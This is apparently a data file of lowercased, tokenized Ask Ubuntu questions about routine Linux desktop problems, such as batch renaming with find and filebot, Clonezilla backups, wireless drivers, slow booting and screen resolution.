234205	find and exec using pulled variable	so far i have a simple batch script that moves *.mkv files from their source folders to a folder called `` movies '' . now i would like filebot to rename them using the 'find ' command , since it ( filebot ) does n't seem to support regular expressions . how would i have bash pull a file-name-variable ( not sure if this is a thing haha ) and use it in find -exec `` $ filename '' kind of pattern ? here is what i have ( pseudo is commented out ) , i 'm sure there 's a more efficient way to do this . but hey , i 'm a python coder not a bash scripter ! mkdir `` movies '' find `` complete/ '' -iname `` *.mkv '' -exec mv { } `` movies '' \ ; # find `` movies/ '' -iname `` *.mkv '' -exec filebot -rename `` $ iname '' -- db themoviedb '' i need the mv and filebot commands to execute separately as eventually more commands will be called between them .
234206	shortcut to switch to app	is it possible to focus an opened app instance/window using a command ? i 'd like to assign a keyboard shortcut as to quickly switch to a specific app . i want shortcuts for : chromium ( now it opens a new window with blank tab ) terminator ( now it opens a new window ) it works fine for these ( running the default command , eg . thunderbird ) : thunderbird sublime text 2 i am using gnome-shell @ 12.04 ( should n't matter )
234210	how to buy preinstalled ubuntu laptop or other linux laptop ? possible online ?	i am trying to categorize threads where people are just trying to get a unix laptop or a linux laptop . it means the laptop is designed to work with unix or linux with freedom-respecting way : without having to worry about things such as closed driver issues or wasting time in installation of the os . personally , i would like to get basic linux tools such as gnu coreutils , blender , gimp , inkscape , sed , awk , emacs , vim-full , git , apt-get/aptitude ( or other proper package-manager/installer ) etc -- by clicking some dialogs and order the laptop online or out of the box ( or something like xcode-style easy installation ) -- without me wasting time in the installation . the laptop must follow posix guidelines . the laptop must be able to work as a development machine so for example chrome os is not option with limited physical data transfer ( everything through the slow cloud ) . how can i buy a freedom-respecting unix laptop or linux laptop such as a preinstalled ubuntu laptop ?
234214	use clonezilla without booting from the clonezilla live cd ?	i have two hard drives , /dev/sda and /dev/sda . predictably , i boot from sda . when i boot from the clonezilla live cd and go through the wizard to make a backup image , it tells me that i can use a command like `` /opt/drbl/sbin/ocs-sr -option1 -option2 imagename sdb . '' i 'd like to backup sdb without booting from the clonezilla live cd , in ubuntu , without rebooting , using a script called from cron , like this : umount /dev/sdb1 /opt/drbl/sbin/ocs-sr -option1 -option2 imagename sdb . mount /dev/sdb1 /path/to/mountpoint but where can i get /opt/drbl/sbin/ocs-sr ? could i boot from the livecd and just copy /opt to wherever i want it ? would n't that skip any dependencies that i might not know about ? or is there somewhere that i could just download those files ( everything i 've found on the clonezilla site are iso 's ) . this is n't really ubuntu-specific , so apologies if this is the wrong place to ask . but i saw a bunch of other clonezilla questions here . thanks in advance
234215	right click not working - trying to use script	i 'm trying to use the script found here : https : //wiki.ubuntu.com/debuggingtouchpaddetection to have my right click working in ubuntu 12.04 . my laptop is a brand new asus k55 ( i think it went into production in october or so ) and xinput says : virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ etps/2 elantech touchpad id=12 [ slave pointer ( 2 ) ] so as per isntructions i 'm doing : ./enable-rightbutton.sh < 12|etps/2 elantech touchpad > but i get bash : syntax error near unexpected token `newline' any help is much appreciated - right now i can only single click .
234216	run ubuntu 12.10 from 8gb usb stick ( non liveusb method )	this was how i used to do it : download ubuntu desktop iso to pc . burn iso to cd . boot from cd and select install ubuntu . select to install to 8 gb usb stick and set grub to usb stick . the result of this is that if i boot my laptop without the usb stick plugged in , it will boot directly to windows 7 . however , as and when i need to boot to ubuntu , i just plug in the usb stick and restart the laptop . it will then boot to grub which gives me the option of booting to ubuntu or booting to windows . the key to all this is to create ubuntu boot cd but now i 'm not able to with 12.10 because the iso size is more than 700mb . i 've read some threads that mention try burning to dvd-r instead . tried that but did n't work . ( yes , i choose to burn img ( iso ) to disc instead of burn file to disc ) . i 'm using nero burning rom app to do the burning . so how do i create a ubuntu 12.10 desktop livecd or livedvd using the 753mb iso ?
234217	how to do gif animations for instructions and learning purposes over gui ?	i am trying to categorize many similar threads here . for example , i find this gif animation freaking cool in this answer here . how can i do this kind of animations ? how can i make sure it does not consume too much cpu with less cpu-intensive computers ? how can i do professional screencast ?
234223	alternative file managers ?	i 'm using gnome 3.6 in ubuntu 12.10 and i dislike nautilus . i 've tried marlin and was happy until i realized that there 's no search function . i 'm not sure how to go about searching this so i 'd appreciate it if someone with any type of knowledge/experience in file managers could help me out . : ) my basic needs are that : - it looks nice - it has a search function ( similar to nautilus ' ) - it 's somewhat speedy - it has an undo function i 'd also like : - plugins - the ability to search within text files and documents - tabs i hope that 's not too much to ask . if i can find an alternative with just the basics i 'll be more than happy .
234224	minecraft does n't start on lubuntu 12.10	i 've installed openjdk 6 , opened the jar with java by right clicking , but it doesnt do anything what am i missing ? i 've also tried java -jar minecraft.jar with sudo , did n't worked : (
234225	blackarmor on linux	so anyone who knows about the maxtor blackarmor hard drives knows that they have software for use with windows for encryption and i 'm trying to find a way to format my blackarmor 320gb hard drive to utilize what it currently has . when mounted it 's read as having 0 free space on a completely empty hard drive and has 31.4 mb of data on it . the data is the help folder . the maxtor manager folder and the launcher.exe and is mounted as a udf . how can i format it to no longer require the exe to unlock the hard drive in full and to utilize the drive as a normal hard drive with linux encryption ? thanks for any help that may be out there .
234234	why ca n't i install codec for ffmpeg ?	when i run sudo apt-get install libavcodec-extra-53 i get the following packages have unmet dependencies : libavcodec-extra-53 : depends : libfaac0 but it is not installable
234236	two-finger scrolling in lxde ( ubuntu 12.10 )	i ca n't get two-finger scrolling to work in lxde w/ ubuntu 12.10 . here 's a brief history . i upgraded my machine ( an old dell inspiron 1200 ) from ubuntu 10.04 lts to ubuntu 12.10 all in one fell swoop , and then installed lxde and completely removed all ubuntu-desktop packages using the psychocats instructions ( because i greatly dislike unity ) . in short , it 's more or less basically like lubuntu now , as far as i can tell . all other programs and settings work just fine -- but not two-finger scrolling . help ? ( oh , and there will be bonus points for anyone with right ideas about how to enable `` natural scrolling '' after i get the two-finger scrolling working ! )
234239	how well does ubuntu work with a dual cpu computer ?	i am thinking of getting a dual intel xeon machine , each cpu is a quad core . will ubuntu utilize both processors , especially with both being quad core , optimally ? wanting to do video editing and processing , but the xeon machine 's clock speed is actually slower than my current computer , so if both procs are not being used , i will actually end up with a slower machine than i already have . i am not too familiar with dual processor machines . thanks in advance for any answers .
234245	dumping a list of corrupt video files & quality	having trouble finding a solution to this . i have a folder with a few thousand movies in it , and maybe 20-30 are corrupt . i 'm trying to find a way to list these corrupt files ( not delete them ) . they are named nicely , and all located in one directory ( /media/ns02/movies/* ) i found that xbmc can not find quality information of these files , and tried dumping a list of the damaged ones to no avail . i also tried using mediainfo . i 'm particularly interested in this approach , as i would also like printed a list of videos that are n't 720p ( separately ) . the video files are mkv , mp4 and avi . i am not particularly worried about getting avi quality . how could i achieve these ? i prefer cli approaches .
234247	where is my android phone 's mount point , so i can rsync it ?	i would like to rsync my music with my android phone ( galaxy nexus ) , i 'm trying to work out the mount path to use from the shell . the mount command does n't show up on the phone . in nautilus the location of a music file is shown as : gphoto2 : // [ usb:001,009 ] /music/foo.mp3 how would i mount this location from the shell ? ( i know about banshee and other music players . i just want to use the easy , reliable , crashless rsync . ) % cat /etc/issue ubuntu 12.04.1 lts \n \l % uname -a linux guava 3.2.0-35-generic # 55-ubuntu smp wed dec 5 17:42:16 utc 2012 x86_64 x86_64 x86_64 gnu/linux
234250	what can i do if synaptic ca n't get the latest version of software ?	i 'm using synaptic for package management on ubuntu 12 , and am currently trying to get the newest version of swig - 2.0.9 . my currently installed package swig in synaptic is version 2.0.7-3ubuntu1 . i would like to have the latest version 2.0.9 , how can i get it ?
234251	why are nvidia drivers proprietary ?	what is so secret in the drivers that they need to be closed ? . are there some sort of legal issues ? i mean if they where opensource everyone would have a better day , game developers and those scientists that do the mega calculations on the chips etc . im sure cuda would be alot easier and have faster development progression on a multitude of projects . what could be so damaging in the drivers that the world cant have a peak so that they can better interface with the device that they bought ? . does anyone know of a legitimate reason why its like this ? greed ? stupidity ? . i really would like to know ! thanks .
234253	how do i install gmate in ubuntu 12.04	i am trying to install gmate in ubuntu 12.04 , i followed instructions from here sudo apt-add-repository ppa : ubuntu-on-rails/ppa sudo apt-get update sudo apt-get install gedit-gmate the package successfully installed , but i ca n't see any of the plugins included in gmate in gedit plug-ins list . what in am missed ? is gmate not compatable with gedit included in ubuntu 12.04 ?
234254	why do i have to reconfigure x-server after every shutdown	everytime i shutdown my computer running ubuntu 12.04 and power it back on , ubuntu does not seem to detect my video card , and i have to run sudo dpkg-reconfigure xserver-xorg any ideas why this is happening ? thanks
234258	how to mount a yaffs2 filesystem	i have a .img file that uses the yaffs2 filesystem ( an android partition image ) that i want to mount . i ca n't seem to do it with the mount command . how can i do this ? i 'm using ubuntu 12.04 . also , i do n't want to extract it ( i know how to do that using unyaffs ) . i want to mount it .
234259	ubuntu 12.10 : is possible to use dash as a google desktop alternative ?	i just need to know what asked in question subject . may i use dash to index & search documents , emails , pdfs in a way similar to google desktop does ? is also possible to specify which directories to search either directly or indirectly , for example creating softlinks in my user homedir to my documents folder ?
234269	control file access per user ?	embarrassed to ask this , but have never had to face this before , so ... here goes . some things to know : i have terabytes of storage on a pc that is connected to my television . i have kids who think the word `` delete '' means `` fun ! '' what i 'd like to do is : be able to leave the pc logged in . lock down /mnt/media1 and /mnt/media2 from the pc 's default user ( chow ) any changes to the above done via sudo ideally , i 'd mount those as read-only and then use the sudo command on all cp , mv , etc . changes i 'd need ... chown , mount ? help . : ) before my kids delete 400 gigabytes of the photos we 've taken of them . : p -chow
234273	installing libgtk-3-dev on ubuntu 10.04	how can i install libgtk-3-dev on ubuntu 10.04 ? if i try sudo apt-get install libgtk-3-dev i get could n't find package . it 's not a typo and it 's in correctly so i have no idea where to go . not going to upgrade . i can not stand the distro 's after 10.04 . thanks to anyone who can help .
234279	bluetooth ca n't find any other device	i 'm using acer aspire one 725 netbook with ubuntu 12.04 . when i try to set up a device my laptops bluetooth ca n't find any other device . the buletooth searching wizard is just searching for a new device but no results happen . n.b . : bluetooth of my another device ( e.g . : mobiles ) near to my laptop are in visible mode .
234285	how to block super powers ?	i have a super or a windows key on my keyboard . as a windows user i 'm used to using it to open the start-menu . on ubuntu its a very sensitive key . sometimes when i press it by mistake the whole system goes crazy ( music stops , one time the whole system even froze ) because it activates a pre-defined key-bind . how can i turn off the additional powers of the super key ? when i press it i want it to do nothing .
234288	how to install a program published as a tar.gz file ?	i 'm trying to download and install software for my ubuntu linux machine . i 've downloaded it by wget or the download link and so i get this tar.gz file . after that , i extracted it and saved it to my desktop . what 's the next step ? how do i install this kind of software ?
234292	warning when available ram approaches zero	this is a follow-up to memory limiting solutions for greedy applications that can crash os ? : ulimit and cgroups are not user friendly , and besides , would n't work with applications that spawn separate processes , such as chrome/chromium for each new ( group of ) tabs . the simple and effective solution , used by windows 7 actually , is to warn the user that the os is running low on memory . this simple warning pop-up has prevented me from having any low-memory-caused system freeze in windows , while i kept running into them on ubuntu distros that i was testing live ( where the ram-mounted disk would eat up 2gb alone ) . so , is there some way to automatically warn the user that the available ram is nearing zero , without the user having to keep an eye on some memory monitoring gadget ? surely conky could be configured to do that ?
234295	software center blank screen : gnome keyring problem ?	software center opens to a blank , grey screen and has to be shut down using the 'not responding ' dialogue . opening software-center using terminal leads to the following error : warning : gnome-keyring : : could n't connect to : /tmp/keyring-bj7ymn/pkcs11 : no such file or directory i found a workaround here ( i 'm running xfce on ubuntu 12.04 ) but i have no file at /etc/xdg/autostart/gnome-keyring-pkcs11.desktop . now , i 'm confused . any help ?
234298	where is package linux-kernel-devel for 12.04 ?	previously i rebuilt the 11.04 kernel to allow a tbs qbox2 usb dvb satellite receiver to work , which it did very well under kaffeine . i now tried to build it on ubuntu 12.04 lts with the following result : sudo apt-get install linux-kernel-devel reading package lists ... done building dependency tree reading state information ... done e : unable to locate package linux-kernel-devel seems that the name has changed or ubuntu is n't allowing this any more . any idea of a solution please ?
234304	long ubuntu 12.04 booting time	can someone help me with the delays in booting : [ 6.034566 ] tg3 0000:01:00.0 : eth0 : dma_rwctrl [ 76180000 ] dma_mask [ 64-bit ] [ 10.158037 ] ext4-fs ( sda5 ) : mounted filesystem with ordered data mode . opts : ( null ) [ 43.640175 ] addrconf ( netdev_up ) : eth0 : link is not ready [ 47.632127 ] init : plymouth-stop pre-start process ( 2528 ) terminated with status 1 [ 47.843599 ] ieee80211 phy0 : brcms_ops_bss_info_changed : arp filtering : enabled true , count 1 ( implement ) [ 58.376473 ] wlan0 : no ipv6 routers present [ 67.530222 ] cfg80211 : found new beacon on frequency : 2472 mhz ( ch 13 ) on phy0
234309	bash script not working properly when run automatically	i have a script that sets my proxy automatically depending upon the connection and so its placed in /etc/network/if-up.d/ folder . i set the proxy using gsettings tool and then i want to show a notification on the desktop . i use notify osd as follows : notify-send -u 'critical ' -i /home/vivek/downloads/proxy.ico 'setproxy status ' 'proxy set to auto' the script runs fine because i tried to print some log messages into a file which suggest that the script is being run , but i do not see any visible changes when i check my proxy settings , system settings- > network proxy , i see that the proxy is unchanged although it has changed actually [ i checked the browser and the proxy settings were applied ] , also i see no notification . amazingly if i run the script explicitly as follows : cd /etc/network/if-up.d/ sudo ./setproxy i see the notification at once and also the changes are reflected in network proxy settings . why does this happen ? how can i fix this ? i am on a ubuntu 12.04 system .
234310	ubuntu 12.10 encryption details	good morning ! short version of the question below . please help me understand the encryption features in ubuntu 12.10 . installing ubuntu , i opted both for the full disk encryption option as well as for the `` encrypt home folder '' option . it is my understanding that the encrypted partitions are mounted and deciphered when i turn my computer on . i now like to know under what circumstances what partitions are dismounted and encrypted again . obviously , all of them are dismounted when i turn my computer off . and obviously , not all of them are dismounted when i go into suspend or lock . but what about the home folder ? is it dismounted when my computer suspends or is locked ? in other words : how secure is my data when i just go into suspend or lock my computer ? short version : is the encrypted home folder dismounted when the computer is locked or goes into suspend ? how secure is my data when my computer is locked but not shut down ? thank you ! edit : confused hibernate and suspend .
234320	gnome 3 always hangs after logon	the problem i 'm having is that after logging into gnome shell 3.4.1 on ubuntu 12.04.1 lts . after a short period of time ( approx 0-2 minutes ) gnome shell becomes unresponsive . hovering on the corner / clicking on activities button does n't do anything , windows get stuck ( the application is responding but the gnome is not ) also the alt + f2 does n't do anything . the only way i know how to resolve this issue is to go to linux shell by pressing ctrl + alt + any from f1 to f6 , login and restart the lightdm service . sudo service lightdm restart so the question is how to solve the gnome 3 hang after logon problem ? hertz @ hertzbox : ~ $ uname -a linux hertzbox 3.2.0-35-generic # 55-ubuntu smp wed dec 5 17:42:16 utc 2012 x86_64 x86_64 x86_64 gnu/linux hertz @ hertzbox : ~ $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04.1 lts release : 12.04 codename : precise hertz @ hertzbox : ~ $ gnome-shell -- version gnome shell 3.4.1 p.s . it 's the same with or without extensions loaded edit 1 .xsession-errors ( gnome-settings-daemon:1365 ) : glib-critical ** : g_variant_new_string : assertion `string ! = null ' failed ( gnome-settings-daemon:1365 ) : glib-gio-critical ** : g_settings_schema_key_type_check : assertion `value ! = null ' failed ( gnome-settings-daemon:1365 ) : glib-critical ** : g_variant_get_type_string : assertion `value ! = null ' failed ( gnome-settings-daemon:1365 ) : glib-gio-critical ** : g_settings_set_value : key 'picture-uri ' in 'org.gnome.desktop.background ' expects type 's ' , but a gvariant of type ' ( null ) ' was given ** message : applet now removed from the notification area ** ( nautilus:1585 ) : warning ** : can not get _net_workarea ** ( nautilus:1585 ) : warning ** : can not determine workarea , guessing at layout ** message : stopping registered applet secret agent because gnome shell is running ** message : using fallback from indicator to gtkstatusicon ( gnome-shell:1546 ) : folks-warning ** : failed to find primary personastore with type id 'eds ' and id 'system ' . individuals will not be linked properly and creating new links between personas will not work . the configured primary personastore 's backend may not be installed . if you are unsure , check with your distribution . ** message : applet now embedded in the notification area window manager warning : currenttime used to choose focus window ; focus window may not be correct . window manager warning : got a request to focus 0x1000004 ( desktop ) with a timestamp of 0 . this should n't happen ! nautilus-share-message : called `` net usershare info '' but it failed : 'net usershare ' returned error 255 : net usershare : can not open usershare directory /var/lib/samba/usershares . error no such file or directory please ask your system administrator to enable user sharing . ** ( zeitgeist-datahub:1867 ) : warning ** : recent-manager-provider.vala:133 : desktop file for `` file : ///home/hertz/projects/chrome-steamgifts-notifier/js/options/options.js '' was not found , exec : sublime_text , mime_type : application/javascript ** ( zeitgeist-datahub:1867 ) : warning ** : recent-manager-provider.vala:133 : desktop file for `` file : ///home/hertz/sublime % 20text % 202/icon/256x256/sublime_text.png '' was not found , exec : gnome-desktop-item-edit , mime_type : image/png ** ( zeitgeist-datahub:1867 ) : warning ** : recent-manager-provider.vala:133 : desktop file for `` file : ///home/hertz/sublime % 20text % 202/sublime_text '' was not found , exec : gnome-desktop-item-edit , mime_type : application/octet-stream ** ( zeitgeist-datahub:1867 ) : warning ** : recent-manager-provider.vala:133 : desktop file for `` file : ///home/hertz/desktop/christmastree/tree.py '' was not found , exec : python , mime_type : text/x-python ** ( zeitgeist-datahub:1867 ) : warning ** : recent-manager-provider.vala:133 : desktop file for `` file : ///home/hertz/projects/chrome-steamgifts-notifier/js/test.js '' was not found , exec : sublime_text , mime_type : application/javascript ** ( nautilus:1585 ) : warning ** : error calling current_status : method `` current_status '' with signature `` '' on interface `` com.ubuntuone.syncdaemon.status '' does n't exist ** ( nautilus:1585 ) : critical ** : syncdaemon_status_info_get_online : assertion `syncdaemon_is_status_info ( sinfo ) ' failed window manager warning : currenttime used to choose focus window ; focus window may not be correct . window manager warning : got a request to focus 0x1a00003 ( unlock log ) with a timestamp of 0 . this should n't happen ! ** message : applet now removed from the notification area ( gnome-settings-daemon:1365 ) : gdk-warning ** : gnome-settings-daemon : fatal io error 11 ( resource temporarily unavailable ) on x server :0 . gkr-message : secret service disappeared while waiting for prompt ( nm-applet:1582 ) : gdk-warning ** : nm-applet : fatal io error 11 ( resource temporarily unavailable ) on x server :0 . [ 1586:1617:0105/225607 : error : native_backend_gnome_x.cc ( 664 ) ] keyring find failed : error communicating with gnome-keyring-daemon ( nautilus:1585 ) : gdk-warning ** : nautilus : fatal io error 11 ( resource temporarily unavailable ) on x server :0 . ( gnome-shell-calendar-server:1675 ) : gdk-warning ** : gnome-shell-calendar-server : fatal io error 11 ( resource temporarily unavailable ) on x server :0 . [ 1586:1586:0105/225607 : error : chrome_browser_main_x11.cc ( 62 ) ] x io error detected ( gdu-notification-daemon:1856 ) : gdk-warning ** : gdu-notification-daemon : fatal io error 11 ( resource temporarily unavailable ) on x server :0 . ( evolution-alarm-notify:1895 ) : gdk-warning ** : evolution-alarm-notify : fatal io error 11 ( resource temporarily unavailable ) on x server :0 . ( update-notifier:1946 ) : gdk-warning ** : update-notifier : fatal io error 11 ( resource temporarily unavailable ) on x server :0 . ( deja-dup-monitor:1960 ) : gvfs-remotevolumemonitor-warning ** : owner :1.34 of volume monitor org.gtk.private.gduvolumemonitor disconnected from the bus ; removing drives/volumes/mounts ( deja-dup-monitor:1960 ) : gvfs-remotevolumemonitor-warning ** : owner :1.35 of volume monitor org.gtk.private.gphoto2volumemonitor disconnected from the bus ; removing drives/volumes/mounts ( deja-dup-monitor:1960 ) : gvfs-remotevolumemonitor-warning ** : owner :1.36 of volume monitor org.gtk.private.afcvolumemonitor disconnected from the bus ; removing drives/volumes/mounts ** ( zeitgeist-datahub:1867 ) : warning ** : zeitgeist-datahub.vala:227 : unable to get name `` org.gnome.zeitgeist.datahub '' on the bus ! thanks in advance .
234322	ca n't update error e type libe 58	ca n't open update manger , package manager or software center . the following code appears when i attempt to launch the above : could not initialize the package information an unresolvable problem occurred while initializing the package information . please report this bug against the 'update-manager ' package and include the following error message : 'e : type 'âdeb ' is not known on line 58 in source list /etc/apt/sources.list , e : the list of sources could not be read . ' tried to 'gedit ' it , apparently it does n't handle 'e ' files ? thank you in advance for your help .
234323	moving wubi ubuntu unstallation to partition separated from host partition	i am trying to move my ubuntu installation from disk image created using wubi to the partition i would like to separate from the main windows partition . searching the internet did not help yet . i am looking for some standard solution of this problem ( which i suppose is pretty common ) . in more details : i installed ubuntu using wubi on windows 7 partition , the size of the ubuntu disk image is now 50gib , i tried to apply standard `` migrate to separate partition '' script ( https : //help.ubuntu.com/community/migratewubi ) , but can not resize host ( accessible through /host ) partition due to it being used by several processes , i tried to use gparted from the ubuntu install i want to move . some solutions i can think of are : resize the windows partition and create new one , all from windows 7 environment ( eg . using partition magic or something similar ) , use some live cd with gparted to resize the windows partition and create new ubuntu partition , but i was thinking whether there is some more friendly solution ( preferably automated one , some script etc. ) . please let me know , if there is some .
234326	evince opening pdf via terminal but not via file manager	fresh install of lubuntu 12.10 . tried opening pdf files with document viewer ( evince ) by double clicking but once the application opens i am presented with a red bar saying `` no such file or directory '' . so i thought i would run evince file.pdf to see if any errors are displayed . but none ... the document opens as expected . why the discrepancy ? i really do n't want to use terminal every time i want to open a pdf . -- -more info -- - filenames like : 2012_expense_report_week # 32.pdf $ 100- $ 200_donators.pdf 2013_budget~draft3.pdf
234327	weak wireless signal - atheros ar5008x drops connection	i 'm dualbooting ubuntu 12.04 with windows vista and while vista handles the signal perfectly ( 4 or 5 bars out of 5 and never drops ) ubuntu shows 1 or 2 bars and drops the signal constantly if the laptop is out of 3-4m range . i already tried to google ar5008x linux driver but no luck so far . i 'm a new linux user and would appreciate any help .
234333	make both atheros ethernet controller and broadcom wireless contrller of dell vostro 3460 work	i have bought a new dell 3460 laptop pre-installed with ubuntu 11.10 . all networking worked fine . then i installed ubuntu 12.04 . now the network interface wo n't work . i followed : how do i install bcm43142 wireless drivers for dell vostro 3460/3560 ? this made the wireless card work . then i followed this question in order to make wired network work . however , after that , the wireless interface is never recognized . just the wired network . my current kernel version is 3.2.0-33 how do i have both wired and wireless interfaces work ?
234335	fan noise in ubuntu 12.10	i have installed ubuntu 12.01 on my laptop dell inspiron e1705 . the fan is running continuously and is quite noise . is there any way to fix this problem ? thank you .
234336	how do i print to pdf from wine ?	i am running ms office under wine and would like to print pdf documents . installing the official extension via wine does nothing .
234339	what is repository mirror in debian and ubuntu ?	what is a local mirror of a debian apt repository ? any simple explanation . is it the same as ubuntu repository ? what is the best way to create one ? and is it mandatory to keep the same folder hierarchy as the original repository ? or there is a way to configure that change ?
234341	the dash only searchs music , how can i make it search all categories ?	when i search for something in the circle thing ( top left cornet of the window ) by pressing the windows/super key it only searches in music ( i think its music ) . can i make window key make it search in all categories ? i want to search only for programs and window shortcut is most of the time very fast . the circle thing does not have name .
234343	why does the snmpd.conf file get replaced every time the service is restarted ?	i have installed and configured the snmp and snmpd packages using this guide install and configure snmp on ubuntu as a reference . however , every time i restart the service , the snmpd.conf file that is placed in /etc/snmp/ gets replaced by an empty file . i am not able to edit this file after this and the only option is to delete it and create a new file . how can i fix this ?
234346	slow booting / starting after apt-get update 12.04	i have just bought a new lenovo ideapad z580 , which came with windows 8 . i have since , removed that and installed 12.04 on top . everything works fine . however , after i have to updated all 272 updates using update manager , my machine now takes about 15mins to get to the password/login page . once i have logged in everything works fine . i have a before and after bootchart image if that helps ( should i save it online e.g . pastebin , or can i attach it here ? ) . it 's very odd , in that the slow image has the opening init command taking over 1000 seconds , before the boot process kicks in . since having this issue i have tried multiple things to fix it with no success . yesterday however , i did spend the entire day updating 5-10 updates at a time , to see if i could find the culprit for the slow boot . after going through all of them , i managed to get everything installed fine ! it worked ! ! then i went to install mate on top , and bang , back to 15 minute boot times . uninstalling mate , did n't fix this ! i currently have it working because i removed the latest kernel 3.2.0-35 , so now have 3.2.0-29 . i did this by doing sudo apt-get purge linux-image-3.2.0-35-generic sudo update-grub2 however , even though it is working now , i know that if i upgrade anything i will be left with the 15 minute boot times again . hopefully someone out there can help . thanks russ
234347	huwai e303c is not working	device - huwai e303c network - airtel location - bangalore india os - ubuntu 12.04 lts have tried following but did n't work : installing linux driver which comes along with device tried with following commands on terminal , but did n't work sudo apt-get remove usb-modeswitch usb-modeswitch-data sudo apt-get install usb-modeswitch please could someone help me by explaining how i could connect to the e303c device .
234348	why wo n't gedit display hebrew letters in documents , while libreoffice works fine ?	i am using gedit and libreoffice writer . when i want to write in hebrew i do n't have any problem . when i download a libreofiice file in hebrew i do not have any problem , either . when i download a file that is not a libreoffice file ( which means i am opening it with the gedit ) all i see is àðà äùàéøå ùí åîñôø èìôåï . why is that ? is it because i am opening a file with `` .str '' ? here is an example of website which from there i downloaded the file .
234350	how to access my virtual machine server via hostname ?	i created a ubuntu 12.10 virtual machine in vmware which runs an apache server . the vmware machine is on a bridged network adapter , so it 's using the physical network connected on my host . for now i can access the web server in the vm using its dynamically assigned ip address , e.g . : http : //192.168.1.8/ ... however , its ip address is likely to change everytime i restart the vm ( because of dhcp ) . in order not to have to determine the ip address of the machine over and over again , i 'd like to access it using a domain/host name , e.g . : http : //name.local/ ... how can i accomplish this ? edit : it 's a vmware vm with bridged networking . my host os is ubuntu 12.10 too . my local network uses dhcp and i 'd rather not using static ip address . the dhcp server is the one built-in my router . and i do n't know about the dns sever ( do i have a local one by default ? )
234352	where can i get project looking glass source code ?	i came across project looking glass while searching for different desktop managers . i saw a few previews and i would like to get it on 12.04 . the site from project looking glass 's wikipedia page ( http : //java.net/projects/lg3d ) is n't working . i saw this question but the answer is n't working either . svn gives this error ved [ ~ ] > > > > svn co https : //svn.java.net/svn/lg3d~svn svn : options of 'https : //svn.java.net/svn/lg3d~svn ' : could not connect to server ( https : //svn.java.net ) where do i get the source code for plg ? i want it out of pure interest in programming in java and linux .
234353	not able to install ubuntu on new system	i have here a system with asrock z77 extrem 4 intel 3570k nvidia gtx 570 ocz vertex 2 ssd i burned the newest ubuntu 12.10 x64 image and started to boot from the cd . the menu is there , but after selecting installation there is just a black screen . is this because im using a z77 chipset ? maybe i just have to change the boot option , but i have no idea how and what to edit there . some help ? thank you edit : somebody gave me opensuse 12.2 just to see what is happening , and with the newest suse im able to go through the install menue and start the installation . whatever , unfortunately i would like to use ubuntu : ) so the question is still there : why and how to run it .
234357	copy percent-encoded urls ( rather than unicode urls )	i would like to copy urls in firefox , which are percent-encoded rather than containing unicode characters ( in fact for posting as links on a different se site , which seems to reject unicode urls ) . i have searched , but most sites just give a way to copy and paste as unicode urls . i want to do the opposite .
234358	why does my laptop overheat and discharge faster in ubuntu than windows ?	i am new to linux . i have a dell inspiron 15 with a 1st generation intel core i3 and ubuntu 12.10 . my laptop gets heated quickly which does n't happen on windows . also the battery is discharged faster than in windows . please help .
234360	should i report a bug on ubuntu 's bug tracker or on the upstream 's ?	i am on an updated ubuntu 12.04 and i 've found a bug in the tag feature of nautilus . i 'd like to file this as a bug report , but i 'm confused to where to post it : ubuntu 's bug tracker in launchpad or gnome 's nautilus bugzilla ?
234361	play the movie faster with cvlc	i have seen that i can control the speed of vlc by using the keyboard shortcuts +/- . it works to play the movie slower with [ - ] , but i ca n't get it to play faster than 1.00x with the [ + ] keyboard shortcut . this is with vlc run as cvlc file.mkv version 2.0.3-0ubuntu0 under ubuntu 12.04 x86 . i am doing this on a laptop , so the only '+ ' sign i have is in the [ +/= ] key . any ideas ?
234362	how to fix this problem , where sometimes /dev/video0 becomes automatically /dev/video1 as a result other apps cant read	i have one camera usb which on connect makes a place as /dev/video0 , now using other applications while its reading /dev/video0 works fine , after some time like couple of hours later , automatically the /dev/video0 disappear and it becomes /dev/video1 . as a result the same application stop working to capture it because there is no more /dev/video0 . how is it possible to apply a bash loop to have a clone of /dev/video0 and /dev/video1 always . like if video0 is lost but video1 is present then the script will clone exactly one another . any idea , how to fix it so that we have always /dev/video0 and /dev/video1 clone of any one another ? follow up : well answered too
234363	nitro tasks files location	after trying to sync my tasks from the online nitro client ( on ubuntu one ) , my local client ceased to work ( blank window freezes on `` loading ... '' when program is run ) . i 'm trying to access the tasks list files to recover all the tasks i had so that i can install the application anew . they should be in a /home/.nitro directory but there is no such folder ... could anyone help me find these files/database ? ? i had many tasks there and i do not want to lose them ... p.s . the errors i get when trying to run nitro from a terminal is : /usr/lib/python2.7/dist-packages/gi/overrides/gtk.py:391 : warning : g_object_set_property : construct property `` type '' for object `window ' ca n't be set after construction gtk.window.__init__ ( self , type=type , **kwds ) /usr/lib/python2.7/dist-packages/gi/overrides/gtk.py:391 : warning : g_object_set_property : construct property `` type '' for object `nitrotaskswindow ' ca n't be set after construction gtk.window.__init__ ( self , type=type , **kwds ) ** message : console message : undefined @ 0 : syntaxerror : json parse error : unexpected identifier `` undefined '' ** message : console message : undefined @ 0 : typeerror : 'undefined ' is not an object although my question is not about fixing the bug , any help is also appreciated !
234365	12.10 low screen resolution problem	i have successfully repaired my nvidia driver issue so that the driver is loaded correctly . within nvidia-settings i can setup my desktop to my needs ( 2 displays both at 1920x1080 , twinview ) . after configurating and checking that the displays was set correctly , i clicked `` save to x configuration file '' xorg.conf looks like : section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor0 '' vendorname `` unknown '' modelname `` ancor communications inc asus vw247 '' horizsync 30.0 - 80.0 vertrefresh 50.0 - 75.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gtx 660 ti '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` stereo '' `` 0 '' option `` nvidiaxineramainfoorder '' `` dfp-0 '' option `` metamodes '' `` dfp-0 : 1920x1080 +0+0 , dfp-3 : 1920x1080 +1920+0 '' subsection `` display '' depth 24 endsubsection endsection so i assume that the 1920x1080 resolution is correctly saved to xorg.conf . if i now restart my pc or logout/login , i get just both monitors to 1024x768 . if i then go to 